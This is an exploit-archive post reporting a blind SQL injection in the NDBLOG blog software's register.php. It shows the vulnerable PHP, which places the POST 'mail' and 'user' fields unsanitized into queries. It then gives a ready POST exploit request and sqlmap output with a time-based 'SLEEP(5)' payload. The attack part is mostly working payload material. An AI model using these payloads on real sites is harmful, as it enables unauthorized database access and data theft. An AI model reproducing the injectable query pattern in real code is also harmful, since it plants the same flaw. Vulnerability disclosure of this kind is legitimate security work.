facebook facebook twitter rss

NDBLOG Blind SQL Injection Vulnerability

Author: EjRaM-HaCkEr , Published: 14-10-2014
###################################################
# Title: NDBLOG Blind SQL Injection Vulnerability #
# Exploit Author : EjRaM-HaCkEr #
# Version : All #
# Vendor Home : www.traidnt.net #
# Date: 2014/09/19 #
# Tested in: Linux #
###################################################

code:
$user = $_POST['user'] ;
$pass = md5($_POST['pass']) ;
$mail = $_POST['mail'] ;
$country = $_POST['country'] ;
$age = intval($_POST['age']) ;
$img = $_POST['img'] ;

if (empty($img)){$img = 'imges/no-user-mec.png' ; }

$cm = $db->Query("SELECT mail FROM users WHERE mail = '$mail'") ;
$cn = $db->Query("SELECT name FROM users WHERE user = '$user'") ;

— Exploit —

http://localHost/register.php

POST:
user='&pass=1234&mail='mail@mail.com&img=&age=00&country=00&register=%D8%AA%D8%B3%D8%AC%D9%8A%D9%84+%D8%B9%D8%B6%D9%88%D9%8A%D8%A9+%D8%AC%D8%AF%D9%8A%D8%AF%D8%A9

by sqlmap
Place: POST
Parameter: mail
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user='&pass=1234&mail=sw@w.com' AND SLEEP(5) AND 'x'='x&img=&age=00&country=33&register=%D8%AA%D8%B3%D8%AC%D9%8A%D9%84 %D8%B9%D8%B6%D9%88%D9%8A%D8%A9 %D8%AC%D8%AF%D9%8A%D8%AF%D8%A9

===========================================================

Like us on Facebook :